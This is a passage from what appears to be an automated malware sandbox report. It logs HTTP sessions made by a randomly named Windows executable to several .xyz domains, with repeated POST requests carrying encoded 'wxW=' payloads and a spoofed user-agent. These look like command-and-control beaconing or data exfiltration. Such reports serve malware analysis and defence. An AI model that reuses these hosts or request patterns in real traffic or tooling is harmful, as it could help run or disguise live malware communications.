                                                  Data Raw: 77 78 57 3d 7a 76 56 50 63 54 4e 4a 64 6b 56 63 4c 6f 61 63 73 58 37 57 66 31 67 77 38 51 39 4a 4f 57 4a 35 65 4f 4f 64 38 54 51 49 66 45 6a 42 35 6f 48 75 68 2f 76 66 79 31 4a 41 46 72 4d 43 79 31 71 78 45 39 53 36 4b 64 47 4c 75 4e 67 2f 4e 34 4c 73 39 65 37 4d 51 48 46 50 64 39 79 66 37 4e 70 5a 42 50 5a 43 57 53 79 70 59 30 72 34 6d 30 35 71 73 46 2b 69 53 4e 42 30 6c 36 61 6c 33 32 47 68 34 64 68 48 63 74 6c 41 70 35 37 4f 35 54 51 39 57 6a 79 45 67 68 52 57 51 54 61 4a 75 57 53 49 58 62 61 34 51 6c 43 76 4e 6a 30 59 65 50 50 34 49 79 53 2f 42 55 5a 62 55 49 68 47 77 57 67 49 66 4e 32 46 6f 55 46 6d 62 74 47 75 65 42 5a 69 49 32 76 4b 59 77 64 59 54 4f 30 4b 4c 53 50 42 6e 47 66 31 4b 55 33 73 35 56 74 56 56 57 42 78 4b 64 71 42 53 70 78 4a 69 67 33 41 7a 49 71 71 72 69 35 64 76 58 6b 63 42 62 4d 31 75 71 45 45 5a 37 59 2b 55 42 31 44 56 6c 37 44 45 7a 6f 30 63 33 48 72 73 42 44 7a 61 79 43 52 5a 46 36 34 6f 6d 63 32 55 4a 37 73 78 4a 39 6c 4f 77 78 2f 36 76 64 6a 30 35 30 46 6e 38 54 56 59 66 [TRUNCATED]
                                                  Data Ascii: wxW=zvVPcTNJdkVcLoacsX7Wf1gw8Q9JOWJ5eOOd8TQIfEjB5oHuh/vfy1JAFrMCy1qxE9S6KdGLuNg/N4Ls9e7MQHFPd9yf7NpZBPZCWSypY0r4m05qsF+iSNB0l6al32Gh4dhHctlAp57O5TQ9WjyEghRWQTaJuWSIXba4QlCvNj0YePP4IyS/BUZbUIhGwWgIfN2FoUFmbtGueBZiI2vKYwdYTO0KLSPBnGf1KU3s5VtVVWBxKdqBSpxJig3AzIqqri5dvXkcBbM1uqEEZ7Y+UB1DVl7DEzo0c3HrsBDzayCRZF64omc2UJ7sxJ9lOwx/6vdj050Fn8TVYfpd5RQ3yaSaimZEEicLQWGmQwOrM1lwiZu5eNfqY4VgyRF821DQ9VGhwV3U4mCuIlVp7HZO+JgymxSPctnNHRAM10oSqe2KgQEnw4HssYIgcAoDV2uMOoZ6J98A5EoZC1TYzG9bdbMou9FEmx9L+W1FKsKYLPsLfbOpX6WAe9UpMa/0uKSPfPsJw5UYyHPvEfx4X103eLb41BQYi7U1fHZw/tI5bc94hDRGpK3PQl3oO3RH3LYV59+s0RNUFNlWukqgTAEEPrXT6BlgZdmuttsQvX07v/J3ISmC0bhpqFpz1ieOTDK3F40MbJlDo/PwOVRCclYlHqDrbrotevoVnujWgnSZKO7TgLgiNaySj4pK77JymUDoQ9PUbY9hh1twR+A4zhoBdHHEWfMxZLN0iM33RwtBO7HubJzeNZWgnstEktwnS/4IKleAjSYX2N2fDJJjJLGpcBWABuI0xrAg7DTmWSCrGo7Ia/eBYwe/OBdxlXFy6+hQZHW9hmsoqnE9JULw9JSHNaPBjPITf9K/duBbMGGDWSPjYioTie3H2Gcq0PXTkiOMjXDusIgyGIbPtzFoa2S2UXvhgyyrRpSLp479CnFSrkvfVX4C1uqMAvCZJUrQAQGLam8Y9pLMloEwyZq5zJZF20wPXwNwqGzT6M4zKoHj3BD2bpD4 [TRUNCATED]
                                                  Aug 16, 2024 09:33:47.746777058 CEST1558OUTData Raw: 45 68 4a 6a 46 38 33 70 34 77 39 57 39 59 76 79 4f 59 30 67 49 57 42 57 54 44 52 7a 33 78 6d 41 37 59 73 4f 43 58 4d 72 4c 4b 78 63 55 73 34 2f 39 72 68 62 77 6a 4d 7a 4d 69 4b 79 57 79 73 77 64 4f 4c 6d 47 47 39 69 70 38 64 59 31 74 53 71 68 70
                                                  Data Ascii: EhJjF83p4w9W9YvyOY0gIWBWTDRz3xmA7YsOCXMrLKxcUs4/9rhbwjMzMiKyWyswdOLmGG9ip8dY1tSqhpx7Km1ykEadTHaXQDsD59Yc06wSZq6Ls/C3JRcRZV6oJbhtMH/wZQmDiOmVJ5IeDBQ8pnd2tEIPMOHInytcrU0InG3VLTkQfusHx2YlGAkhPaq6lFkqLzvjf3YBzVCDiphbjBzptLu0A/V7dnEbekrh/7ulFJMaoij
                                                  Aug 16, 2024 09:33:48.840117931 CEST190INHTTP/1.1 400 Bad Request
                                                  Server: nginx
                                                  Date: Fri, 16 Aug 2024 07:33:48 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: d404 Not Found0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.2249182103.249.106.91801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:33:50.278562069 CEST344OUTGET /weeg/?o4=jn1L46&wxW=+t9vfnkbYU1QJIfziniMQm4D0SJKDGsGeZHR+z4AZEyX1J3gptrY73VQNNQ/+mGIVtW5Aqaflf0RAZz5+q7KDi1WF5zu290DE+JeXwSEBwj5ukFt81bZJ4VTl/P9 HTTP/1.1
                                                  Host: www.2886080.xyz
                                                  Accept: */*
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Aug 16, 2024 09:33:51.287039042 CEST1236INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Fri, 16 Aug 2024 07:33:51 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Data Raw: 61 34 32 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 26 23 32 30 39 30 38 3b 26 23 32 36 33 37 36 3b 26 23 32 36 35 33 39 3b 2d 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 37 36 31 31 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 26 23 32 39 32 35 35 3b 20 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 35 37 37 33 3b 26 23 32 35 39 31 38 3b 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 39 30 38 3b 26 23 32 36 33 37 36 3b 26 23 32 36 35 33 39 3b 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 39 30 38 3b 26 23 32 36 33 37 36 3b 26 23 32 36 35 33 39 3b 22 20 2f 3e 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 20 5d 3e 3c 73 63 72 69 70 74 20 74 79 [TRUNCATED]
                                                  Data Ascii: a42b<!DOCTYPE HTML><html lang="zh-CN"><head><meta charset="utf-8"><title>&#20908;&#26376;&#26539;-&#20813;&#36153;&#27611;&#25773;&#25918;&#29255; &#22312;&#32447;&#25773;&#25918;</title><meta name="keywords" content="&#20908;&#26376;&#26539;" /><meta name="description" content="&#20908;&#26376;&#26539;" />...[if lt IE 9 ]><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/helper/modernizr.js"></script><![endif]--><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/cmstop-common.js"></script><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/jquery.js"></script><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/config.js"></script><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/js/jquery.cookie.js"></script><link rel="stylesheet" type="text/css" href="http://www.2886080.xyz/template/news/lvse/skin/html/css/style.css" /><scr [TRUNCATED]
                                                  Aug 16, 2024 09:33:51.287059069 CEST1236INData Raw: 32 38 38 36 30 38 30 2e 78 79 7a 2f 74 65 6d 70 6c 61 74 65 2f 6e 65 77 73 2f 6c 76 73 65 2f 73 6b 69 6e 2f 68 74 6d 6c 2f 6a 73 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74
                                                  Data Ascii: 2886080.xyz/template/news/lvse/skin/html/js/common.js"></script><script type="text/javascript" src="http://www.2886080.xyz/template/news/lvse/skin/html/js/list.js"></script></head><body><bdo dir="0a23d8"></bdo><dfn lang="b3c1d5"></dfn><font dr
                                                  Aug 16, 2024 09:33:51.287065029 CEST1236INData Raw: 6e 62 73 70 3b 26 6e 62 73 70 3b e7 be 8e e7 ab b9 e9 93 83 3c 2f 61 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 6c 69 3e 3c 6c 69 20 3e 3c 73 74 72 6f 6e 67 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 32 38 38 36 30 38 30 2e 78 79 7a
                                                  Data Ascii: nbsp;&nbsp;</a></strong></li><li ><strong><a href='http://www.2886080.xyz/chaomeihuixiang/'><span class="i875a9 glyphicon glyphicon-book"></span>&nbsp;&nbsp;</a></strong></li><li ><strong><a href='http://www.2886080.xyz/wu
                                                  Aug 16, 2024 09:33:51.287097931 CEST672INData Raw: 73 73 3d 22 70 30 33 38 31 34 20 6d 61 69 6e 20 6e 65 77 73 6c 69 73 74 22 3e 3c 74 74 20 64 72 6f 70 7a 6f 6e 65 3d 22 63 66 34 64 66 63 22 3e 3c 2f 74 74 3e 3c 76 61 72 20 64 61 74 65 2d 74 69 6d 65 3d 22 62 62 38 61 35 34 22 3e 3c 2f 76 61 72
                                                  Data Ascii: ss="p03814 main newslist"><tt dropzone="cf4dfc"></tt><var date-time="bb8a54"></var><area dir="a94b9f"></area><div lang="137623" class="q100b1 listl list2"><map lang="21875d"></map><bdo draggable="b95894"></bdo><dfn dropzone="c95a10"></dfn><div
                                                  Aug 16, 2024 09:33:51.287329912 CEST1236INData Raw: 22 68 74 74 70 3a 2f 2f 77 77 77 2e 32 38 38 36 30 38 30 2e 78 79 7a 2f 46 72 69 65 6e 64 73 2f 37 30 62 30 39 39 39 32 39 2e 68 74 6d 6c 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 e6 95 8c e8 90 a5 e5 8d 81 e5
                                                  Data Ascii: "http://www.2886080.xyz/Friends/70b099929.html" target="_blank" title=""><img dir="539264" src="http://www.2886080.xyz/uploads/images/7726870.jpg" alt="" width="250" height="165"/></a><var dir="
                                                  Aug 16, 2024 09:33:51.287341118 CEST1236INData Raw: 3e 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 32 38 38 36 30 38 30 2e 78 79 7a 2f 46 72 69 65 6e 64 73 2f 30 38 31 62 30 36 31 39 39 38 35 37 2e 68 74 6d 6c 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74
                                                  Data Ascii: ></a><a href="http://www.2886080.xyz/Friends/081b06199857.html" target="_blank" title="11"><img date-time="038141" src="http://www.2886080.xyz/uploads/images/7364440.jpg" alt="11" width="250" height="165"/></a><time date-tim
                                                  Aug 16, 2024 09:33:51.287353039 CEST1236INData Raw: 7a 2f 46 72 69 65 6e 64 73 2f 30 33 30 64 30 36 31 39 39 39 30 38 2e 68 74 6d 6c 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 e4 ba 9a e6 b4 b2 e9 ab 98 e6 b8 85 e7 94 b5 e5 bd b1 22 3e 3c 69 6d 67 20 64 72 6f 70
                                                  Data Ascii: z/Friends/030d06199908.html" target="_blank" title=""><img dropzone="91058d" src="http://www.2886080.xyz/uploads/images/5033160.jpg" alt="" width="250" height="165"/></a><small dropzone="63142e"></small><su
                                                  Aug 16, 2024 09:33:51.287400007 CEST1236INData Raw: 7a 2f 46 72 69 65 6e 64 73 2f 38 63 30 36 31 39 39 39 33 30 2e 68 74 6d 6c 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 74 69 74 6c 65 3d 22 79 79 38 30 39 30 e6 96 b0 e8 a7 86 e8 a7 89 22 3e 3c 69 6d 67 20 64 72 61 67 67 61 62 6c 65
                                                  Data Ascii: z/Friends/8c06199930.html" target="_blank" title="yy8090"><img draggable="e944eb" src="http://www.2886080.xyz/uploads/images/8693410.jpg" alt="yy8090" width="250" height="165"/></a><font draggable="fe282c"></font><ins dropzo
                                                  Aug 16, 2024 09:33:51.287411928 CEST1236INData Raw: ba a7 e8 a7 86 e9 a2 91 22 3e 3c 69 6d 67 20 6c 61 6e 67 3d 22 30 37 38 34 63 31 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 32 38 38 36 30 38 30 2e 78 79 7a 2f 75 70 6c 6f 61 64 73 2f 69 6d 61 67 65 73 2f 36 34 39 36 33 30 30 2e 6a 70
                                                  Data Ascii: "><img lang="0784c1" src="http://www.2886080.xyz/uploads/images/6496300.jpg" alt="" width="250" height="165"/></a><bdo lang="f70120"></bdo><dfn draggable="c64bb8"></dfn><font dropzone="8ef3c8"></font><div draggable="a
                                                  Aug 16, 2024 09:33:51.287421942 CEST1236INData Raw: be e9 9a 86 e7 8e 8b e6 9c 9d 22 3e 3c 69 6d 67 20 64 69 72 3d 22 63 32 30 33 39 38 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 32 38 38 36 30 38 30 2e 78 79 7a 2f 75 70 6c 6f 61 64 73 2f 69 6d 61 67 65 73 2f 33 31 33 35 33 39 30 2e 6a
                                                  Data Ascii: "><img dir="c20398" src="http://www.2886080.xyz/uploads/images/3135390.jpg" alt="" width="250" height="165"/></a><area dir="8cf590"></area><map lang="f68bb1"></map><bdo draggable="13465c"></bdo><div lang="131f14" class="p
                                                  Aug 16, 2024 09:33:51.292503119 CEST1236INData Raw: 61 74 65 2d 74 69 6d 65 3d 22 61 61 66 31 66 64 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 32 38 38 36 30 38 30 2e 78 79 7a 2f 75 70 6c 6f 61 64 73 2f 69 6d 61 67 65 73 2f 39 38 30 33 39 34 30 2e 6a 70 67 22 20 61 6c 74 3d 22 e5 93 81
                                                  Data Ascii: ate-time="aaf1fd" src="http://www.2886080.xyz/uploads/images/9803940.jpg" alt="" width="250" height="165"/></a><tt date-time="f8dcc9"></tt><var dir="a83c0e"></var><area lang="1e2da3"></area><div dir="399801" class="t9d73e standpoin


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.224918385.159.66.93801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:34:05.627365112 CEST2472OUTPOST /jwh2/ HTTP/1.1
                                                  Host: www.kcrkimya.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.kcrkimya.xyz
                                                  Referer: http://www.kcrkimya.xyz/jwh2/
                                                  Content-Length: 2160
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Data Raw: 77 78 57 3d 6e 79 4b 4b 6d 67 43 4e 7a 49 42 68 49 38 70 43 47 37 65 32 71 6d 79 78 66 69 63 63 69 43 58 51 75 63 32 70 5a 79 73 73 30 53 48 75 4e 39 35 58 31 75 4c 57 36 74 4b 4c 45 4c 6a 34 74 77 6e 61 6a 72 74 53 69 6c 32 42 4a 6f 70 58 59 4e 55 4b 46 49 56 46 78 4b 67 59 78 41 68 76 41 69 79 43 49 62 35 53 47 34 73 69 63 62 33 50 67 56 62 72 46 68 78 53 73 49 44 79 34 50 74 53 5a 70 4e 34 44 48 45 47 53 68 36 6a 48 50 37 6e 52 54 6c 6b 62 5a 43 78 4b 41 37 70 45 42 36 32 51 42 32 34 58 58 50 33 4a 62 7a 78 35 76 61 53 68 2f 69 56 32 5a 65 35 67 33 4d 69 44 2f 77 51 65 4a 32 75 38 43 64 43 7a 35 6b 57 61 36 5a 38 6a 4a 6e 6b 6c 41 6f 35 78 6a 37 4f 55 59 6b 77 66 31 74 78 51 33 76 7a 79 78 35 44 76 70 70 56 65 39 77 64 34 73 4d 4f 4f 55 53 54 35 4c 67 6a 78 77 59 4a 48 51 65 56 46 6d 41 43 44 43 4e 66 32 56 54 53 55 31 78 7a 2f 50 46 32 6c 6c 54 51 57 4e 68 41 4e 57 67 52 6e 70 4c 4e 34 72 75 42 4b 77 6b 5a 6a 77 64 4c 78 53 46 6f 75 77 39 44 6e 4f 43 72 44 71 6f 68 6b 4e 72 63 63 2f 49 37 4e 58 [TRUNCATED]
                                                  Data Ascii: wxW=nyKKmgCNzIBhI8pCG7e2qmyxficciCXQuc2pZyss0SHuN95X1uLW6tKLELj4twnajrtSil2BJopXYNUKFIVFxKgYxAhvAiyCIb5SG4sicb3PgVbrFhxSsIDy4PtSZpN4DHEGSh6jHP7nRTlkbZCxKA7pEB62QB24XXP3Jbzx5vaSh/iV2Ze5g3MiD/wQeJ2u8CdCz5kWa6Z8jJnklAo5xj7OUYkwf1txQ3vzyx5DvppVe9wd4sMOOUST5LgjxwYJHQeVFmACDCNf2VTSU1xz/PF2llTQWNhANWgRnpLN4ruBKwkZjwdLxSFouw9DnOCrDqohkNrcc/I7NXVNe8paNMsps/wtC07wQdsljCjPbvoSdmeu+aEmWMQdFxJUJcMtgppCbre+/CC5e4ySTdltnkUFLL8b9iLueIveUYBPeOxtqMtCLFdkS3XGtdKFJIlDcYXucpLN47iboLhL0B12S4MVyNnP507Dn0SeXFYCj4umn/3lTYTBfmlGK2rcFaafpJYtHJWcSdcyivTqckxvW/zQnagvDHWSofhN3dHzPWXXlnAflYxj/2J4rSgHsR1ahpKswGZcHj9qtaGTMY6qEn15Dx9FJrJksjXvN5M/wXQ+34CZuihA9oigsRLEl/KqQTwNDHvypc8OkaivSCF0uQ4soLXiCsoOhLXT2upwr6el2Mlo67qCZyWSKJaTII3+qwkFsgslvRYe/19D27lV9KZR+mAXr0mD3OFGPTqYcDrTGoSHbPcbB0ulzoSpALD9Xf5OoJvrnqEg2JceQrOU3MR3ccFD0km+eOgHi4IVPdw9eekcpkygutL9c+gHyKqQkuwSDSLQWLV7KCVVoMQmCY+WfiaI3J+sb1rZ7sbDZlTwJm/KOgZzYsEYegeOPLRwEVsKWQ05CmIpmyB6uugZn4xsbRLf4KZeBJP1XqQnF+EXbDI0n5d2dJk+Jf5lTOCTegdhPAlN4bSBOmuo5T1PN/6vf55oTWNT55mtLZOWughcNeWh [TRUNCATED]
                                                  Aug 16, 2024 09:34:05.632529020 CEST97OUTData Raw: 50 44 61 64 73 52 77 63 66 41 44 32 42 30 67 57 66 34 49 4a 39 78 6a 69 57 51 73 57 59 75 75 6f 66 35 65 66 41 4e 42 65 79 65 32 70 59 43 57 52 33 48 4f 4f 52 58 51 65 43 6e 56 46 67 56 56 48 54 31 7a 79 54 5a 45 49 59 75 6d 4d 42 78 47 4b 78 55
                                                  Data Ascii: PDadsRwcfAD2B0gWf4IJ9xjiWQsWYuuof5efANBeye2pYCWR3HOORXQeCnVFgVVHT1zyTZEIYumMBxGKxUpPbmOJce52icaif
                                                  Aug 16, 2024 09:34:06.427290916 CEST225INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.14.1
                                                  Date: Fri, 16 Aug 2024 07:34:06 GMT
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Rate-Limit-Limit: 5s
                                                  X-Rate-Limit-Remaining: 19
                                                  X-Rate-Limit-Reset: 2024-08-16T07:34:11.3224225Z


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.224918485.159.66.93801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:34:08.291066885 CEST608OUTPOST /jwh2/ HTTP/1.1
                                                  Host: www.kcrkimya.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.kcrkimya.xyz
                                                  Referer: http://www.kcrkimya.xyz/jwh2/
                                                  Content-Length: 200
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Data Raw: 77 78 57 3d 6e 79 4b 4b 6d 67 43 4e 7a 49 42 68 49 39 70 43 46 4a 6d 32 72 47 79 78 54 43 63 63 73 69 58 57 75 63 71 66 5a 7a 35 78 30 6a 50 75 4e 76 68 58 79 64 6a 57 35 74 4b 45 4f 72 6a 30 69 51 6d 41 6a 72 74 77 69 6c 36 42 4a 6f 56 58 58 50 38 4b 4e 73 68 47 39 61 67 57 74 41 68 69 41 69 4f 68 49 62 39 38 47 34 55 69 63 64 66 50 75 31 72 72 48 45 6c 53 6d 59 44 77 76 66 74 65 5a 70 52 74 44 48 55 77 53 69 75 6a 48 62 7a 6e 52 69 46 6b 66 4b 61 78 44 67 37 6f 63 52 37 32 62 55 62 74 63 6c 58 63 49 70 72 47 2b 74 75 58 73 4d 61 67 33 37 69 32 68 31 41 39 41 5a 6c 77 55 35 72 52 71 67 3d 3d
                                                  Data Ascii: wxW=nyKKmgCNzIBhI9pCFJm2rGyxTCccsiXWucqfZz5x0jPuNvhXydjW5tKEOrj0iQmAjrtwil6BJoVXXP8KNshG9agWtAhiAiOhIb98G4UicdfPu1rrHElSmYDwvfteZpRtDHUwSiujHbznRiFkfKaxDg7ocR72bUbtclXcIprG+tuXsMag37i2h1A9AZlwU5rRqg==
                                                  Aug 16, 2024 09:34:08.924228907 CEST225INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.14.1
                                                  Date: Fri, 16 Aug 2024 07:34:08 GMT
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Rate-Limit-Limit: 5s
                                                  X-Rate-Limit-Remaining: 18
                                                  X-Rate-Limit-Reset: 2024-08-16T07:34:11.3224225Z


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.224918585.159.66.93801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 16, 2024 09:34:10.828927040 CEST2472OUTPOST /jwh2/ HTTP/1.1
                                                  Host: www.kcrkimya.xyz
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-US,en;q=0.9
                                                  Origin: http://www.kcrkimya.xyz
                                                  Referer: http://www.kcrkimya.xyz/jwh2/
                                                  Content-Length: 3624
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Connection: close
                                                  Cache-Control: max-age=0
                                                  User-Agent: HTC_Touch_HD_T8282 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)
                                                  Data Raw: 77 78 57 3d 6e 79 4b 4b 6d 67 43 4e 7a 49 42 68 61 4d 5a 43 48 75 4b 32 38 32 79 79 51 43 63 63 69 43 58 6f 75 63 32 66 5a 79 73 73 30 51 6a 75 4e 34 6c 58 79 2b 4c 57 37 74 4b 45 49 72 6a 34 74 77 6e 62 6a 72 70 43 69 6c 72 2b 4a 75 6c 58 59 49 67 4b 46 50 4a 46 79 4b 67 59 36 67 68 74 41 69 50 38 49 66 68 34 47 34 51 63 63 64 33 50 76 44 58 72 47 30 6c 64 6c 59 44 77 76 66 74 5a 5a 70 52 42 44 48 63 6f 53 67 66 34 48 4e 50 6e 52 44 6c 6b 54 4a 43 2b 46 67 37 73 56 78 36 43 51 42 79 46 58 58 50 7a 4a 62 6d 6d 35 76 57 53 68 73 36 56 32 61 32 32 76 48 4d 74 4e 66 77 51 42 5a 32 6f 38 43 64 65 7a 35 6b 57 61 35 4e 38 79 4a 6e 6b 6c 42 6f 34 2f 44 37 4f 4c 6f 6b 39 53 56 78 4c 51 30 54 4e 79 78 6c 54 36 4b 46 56 51 59 6b 64 2f 63 4d 4f 48 45 53 56 35 4c 67 69 2f 51 59 43 48 51 57 64 46 69 6c 66 44 43 4e 66 32 54 76 53 52 6e 70 7a 32 2f 46 32 6e 6c 54 54 64 74 68 42 4e 57 56 30 6e 71 58 4e 34 71 32 42 4c 48 41 5a 72 53 31 4b 2b 43 46 6c 71 77 38 46 74 65 43 45 44 71 6b 4c 6b 4e 69 78 63 38 41 37 4e 53 [TRUNCATED]
                                                  Data Ascii: wxW=nyKKmgCNzIBhaMZCHuK282yyQCcciCXouc2fZyss0QjuN4lXy+LW7tKEIrj4twnbjrpCilr+JulXYIgKFPJFyKgY6ghtAiP8Ifh4G4Qccd3PvDXrG0ldlYDwvftZZpRBDHcoSgf4HNPnRDlkTJC+Fg7sVx6CQByFXXPzJbmm5vWShs6V2a22vHMtNfwQBZ2o8Cdez5kWa5N8yJnklBo4/D7OLok9SVxLQ0TNyxlT6KFVQYkd/cMOHESV5Lgi/QYCHQWdFilfDCNf2TvSRnpz2/F2nlTTdthBNWV0nqXN4q2BLHAZrS1K+CFlqw8FteCEDqkLkNixc8A7NSBNceBaRssm0PwpG0n0Qd0LjBP5bpwSPk2u5YcpZcQTORJeNcMHgpl8bpW+/TK5E76SENZqzEUCYb8X0CL6eILGUdsSe/BtpctCHG1jNXXDj9KXc4lvcYXccord4qaboLRL0Up2S4MWktnJwU/xn0eaXF0oj9imnOHlTcnBLWlGQmrbcqa/pJM9HJOMSNgyiJvqamZvXfzWq6gicXWcofxN3fLjPX/XlDcfqcdj52J81igisR0hho+gwGJmHhZqtYuTOaCqbH1kBx9JY7JXsg2oN4gZwVw+0cOZ9jhA9IiigxLE+PL1QTYdDD/MpdEOnryvFyF3kw4vuLXlPMpBhPLT2u1wr+ql2bFot6qCaCWMOJaFaIzeqw0zsiA1vUIe5k9DgIBU4KZT7mAJhUmn3OFCPSCIczLTG5yHdrIYN0umo4TzOrDZXfp0oNvByJgg2KUeQdSU38R3ccFA0kmieOs1i6gzPdw9fPkcpSug29LyQehb2KqOku9DDTi3WL57Qz1VoMQ5c4+VHyaH3JyLb1r37tnDYQLwGUnKOChzRsEYOwfYYbRxEVsaWUkpCkgplih66IcG64xpPhKcvfBRBJzTXr0nEMQXUyI0npd2D5k/C/58N+PIegBPPFIA4KCBN1mo/QdMGv6uBJ5mTWAl55fgLafjunNcDeWh [TRUNCATED]
                                                  Aug 16, 2024 09:34:10.833811045 CEST1561OUTData Raw: 50 44 59 31 73 41 51 63 59 48 7a 32 48 31 67 57 42 34 49 45 62 78 6a 71 6f 51 74 6d 59 75 72 59 66 6a 2b 50 41 49 78 65 79 58 57 70 64 65 6d 52 71 4a 75 79 53 58 51 44 6a 38 43 42 36 59 7a 72 4c 39 58 79 55 64 31 6f 67 6f 48 6f 64 2b 44 75 32 4d
                                                  Data Ascii: PDY1sAQcYHz2H1gWB4IEbxjqoQtmYurYfj+PAIxeyXWpdemRqJuySXQDj8CB6YzrL9XyUd1ogoHod+Du2MtrGmt4gHvqMUtGfmb5b/3cjNsLEZNECpKWsDvfE6Drjh0ng5N0/S90Y9mqXqZMVJI3QFpR/+QWreTPw488R5vVULJ+gzdODaw6M+TCqaEoYTKj5DniMyZKxDGMRFYG45GcYgKB0YfFrqhzrTvzEHZk9U1kZYr6YYs
                                                  Aug 16, 2024 09:34:11.515023947 CEST225INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.14.1
                                                  Date: Fri, 16 Aug 2024 07:34:11 GMT
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Rate-Limit-Limit: 5s
                                                  X-Rate-Limit-Remaining: 19
                                                  X-Rate-Limit-Reset: 2024-08-16T07:34:16.4085800Z


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.224918685.159.66.93801980C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe
                                                  TimestampBytes transferredDirectionData
